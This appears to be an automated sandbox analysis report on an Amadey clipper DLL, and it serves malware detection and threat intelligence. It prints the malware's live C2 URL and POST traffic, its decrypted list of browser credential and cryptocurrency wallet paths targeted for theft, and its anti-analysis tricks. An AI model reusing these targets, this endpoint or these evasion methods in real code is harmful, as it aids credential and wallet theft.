Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
clip64.dll

Overview

General Information

Sample name:clip64.dll
Analysis ID:1620555
MD5:f923f79b330a5bf8ccb3fda0f71a9c48
SHA1:26145188dc6f3f68ee0ccfacc66b324600a474e9
SHA256:6788afe6d43f633e870c1814251b2a1cc52e3f8c1e34192687bbc5bfdddc99a4
Tags:Amadeydlluser-skocherhan
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Sample uses string decryption to hide its real strings
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6120 cmdline: loaddll32.exe "C:\Users\user\Desktop\clip64.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4832 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 5872 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2432 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4696 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2172 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7228 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7236 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7244 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
    clip64.dllloader_amadey_clipper_pluginFinds Amadey\'s clipper plugin based on characteristic stringsSekoia.io
    • 0x1b516:$str01: CLIPPERDLL.dll
    • 0x1b525:$str02: ??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
    • 0x1b547:$str03: ??4CClipperDLL@@QAEAAV0@ABV0@@Z
    • 0x1b567:$str04: Main
    • 0x1b762:$str05: OpenClipboard
    • 0x1b7aa:$str06: GetClipboardData

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    18.2.rundll32.exe.6d500000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      18.2.rundll32.exe.6d500000.0.unpackloader_amadey_clipper_pluginFinds Amadey\'s clipper plugin based on characteristic stringsSekoia.io
      • 0x1b516:$str01: CLIPPERDLL.dll
      • 0x1b525:$str02: ??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
      • 0x1b547:$str03: ??4CClipperDLL@@QAEAAV0@ABV0@@Z
      • 0x1b567:$str04: Main
      • 0x1b762:$str05: OpenClipboard
      • 0x1b7aa:$str06: GetClipboardData
      14.2.rundll32.exe.6d500000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        14.2.rundll32.exe.6d500000.0.unpackloader_amadey_clipper_pluginFinds Amadey\'s clipper plugin based on characteristic stringsSekoia.io
        • 0x1b516:$str01: CLIPPERDLL.dll
        • 0x1b525:$str02: ??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        • 0x1b547:$str03: ??4CClipperDLL@@QAEAAV0@ABV0@@Z
        • 0x1b567:$str04: Main
        • 0x1b762:$str05: OpenClipboard
        • 0x1b7aa:$str06: GetClipboardData

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-21T01:51:20.681835+010028561521A Network Trojan was detected185.196.8.3780192.168.2.749700TCP
        2025-02-21T01:51:23.230307+010028561521A Network Trojan was detected185.196.8.3780192.168.2.749707TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://185.196.8.37/Gd85kkjf/index.php#Avira URL Cloud: Label: malware
        Source: http://185.196.8.37/Gd85kkjf/index.phpAvira URL Cloud: Label: malware
        Found malware configuration
        Source: clip64.dllMalware Configuration Extractor: Amadey {"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}
        Multi AV Scanner detection for submitted file
        Source: clip64.dllReversingLabs: Detection: 73%
        Source: clip64.dllVirustotal: Detection: 77%Perma Link
        Sample uses string decryption to hide its real strings
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Mozilla\Firefox\Profiles\
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Electrum(
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: electrum_data\wallets
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Electrum\wallets
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \logins.json
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Exodus\exodus.wallet\
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Electrum.exe
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: 185.196.8.37
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: /Gd85kkjf/index.php
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Litecoin\wallets
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: DashCore\wallets\
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Telegram.exe
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Desktop.zip
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: atomic\Local Storage\
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: CentBrowser
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: key=clear
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: tdata\key_datas
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Telegram(
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \user_data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \dictionaries
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CentBrowser\User Data\Local State
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CentBrowser\User Data\Default\Login Data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Chedot\User Data\Default\Login Data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Comodo\Dragon\User Data\Local State
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Google\Chrome\User Data\Default\Login Data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CocCoc\Browser\User Data\Local State
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Microsoft\Edge\User Data\Local State
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Orbitum\User Data\Default\Login Data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Google\Chrome\User Data\Local State
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Vivaldi\User Data\Default\Login Data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Comodo\Dragon\User Data\Default\Login Data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CocCoc\Browser\User Data\Default\Login Data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \SputnikLab\Sputnik\User Data\Local State
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Opera Software\Opera Stable\Login Data
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Opera Software\Opera Stable\Local State
        Source: 00000005.00000002.1254392816.000000000067A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Microsoft\Edge\User Data\Default\Login Data
        Source: clip64.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        Source: clip64.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D50BCEE FindFirstFileExW,14_2_6D50BCEE

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2856152 - Severity 1 - ETPRO MALWARE Ameday CnC Response M2 : 185.196.8.37:80 -> 192.168.2.7:49707
        Source: Network trafficSuricata IDS: 2856152 - Severity 1 - ETPRO MALWARE Ameday CnC Response M2 : 185.196.8.37:80 -> 192.168.2.7:49700
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.196.8.37 80Jump to behavior
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorIPs: 185.196.8.37
        Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D501EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_6D501EC0
        Source: unknownHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: rundll32.exe, 0000000E.00000002.3720488782.0000000003349000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/
        Source: rundll32.exe, 0000000E.00000002.3720488782.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php
        Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php#
        Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php4
        Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.phpPe4
        Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.phph
        Source: rundll32.exe, 00000012.00000002.3721926151.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.phpo
        Source: rundll32.exe, 0000000E.00000002.3720488782.000000000333F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.phpw
        Source: rundll32.exe, 0000000E.00000002.3720488782.0000000003349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/t%
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D5031B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,14_2_6D5031B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D5031B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,14_2_6D5031B0

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: clip64.dll, type: SAMPLEMatched rule: Finds Amadey\'s clipper plugin based on characteristic strings Author: Sekoia.io
        Source: 18.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPEMatched rule: Finds Amadey\'s clipper plugin based on characteristic strings Author: Sekoia.io
        Source: 14.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPEMatched rule: Finds Amadey\'s clipper plugin based on characteristic strings Author: Sekoia.io
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D5031B014_2_6D5031B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D511AB114_2_6D511AB1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D5073B0 appears 34 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D505D90 appears 103 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D506B05 appears 47 times
        Source: clip64.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        Source: clip64.dll, type: SAMPLEMatched rule: loader_amadey_clipper_plugin author = Sekoia.io, description = Finds Amadey\'s clipper plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 487b6657-8834-45ee-8fd4-03df9c0dd7be
        Source: 18.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPEMatched rule: loader_amadey_clipper_plugin author = Sekoia.io, description = Finds Amadey\'s clipper plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 487b6657-8834-45ee-8fd4-03df9c0dd7be
        Source: 14.2.rundll32.exe.6d500000.0.unpack, type: UNPACKEDPEMatched rule: loader_amadey_clipper_plugin author = Sekoia.io, description = Finds Amadey\'s clipper plugin based on characteristic strings, creation_date = 2023-05-16, classification = TLP:CLEAR, version = 1.0, id = 487b6657-8834-45ee-8fd4-03df9c0dd7be
        Source: classification engineClassification label: mal100.troj.spyw.evad.winDLL@18/0@0/1
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
        Source: clip64.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: clip64.dllReversingLabs: Detection: 73%
        Source: clip64.dllVirustotal: Detection: 77%
        Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\clip64.dll"
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,Main
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,MainJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",MainJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: clip64.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: clip64.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: clip64.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 493Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 9500Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2405Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 7588Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 6012Thread sleep count: 493 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 6012Thread sleep time: -493000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 6012Thread sleep count: 9500 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 6012Thread sleep time: -9500000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7248Thread sleep count: 2405 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7248Thread sleep time: -2405000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7248Thread sleep count: 7588 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7248Thread sleep time: -7588000s >= -30000sJump to behavior
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D50BCEE FindFirstFileExW,14_2_6D50BCEE
        Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
        Source: rundll32.exe, 0000000E.00000002.3720488782.000000000338E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
        Source: rundll32.exe, 0000000E.00000002.3720488782.0000000003349000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.3720488782.000000000338E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.3721926151.0000000002A3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

        Anti Debugging

        barindex
        Found potential dummy code loops (likely to delay analysis)
        Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 42% for more than 60s
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D509820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_6D509820
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D50B881 mov eax, dword ptr fs:[00000030h]14_2_6D50B881
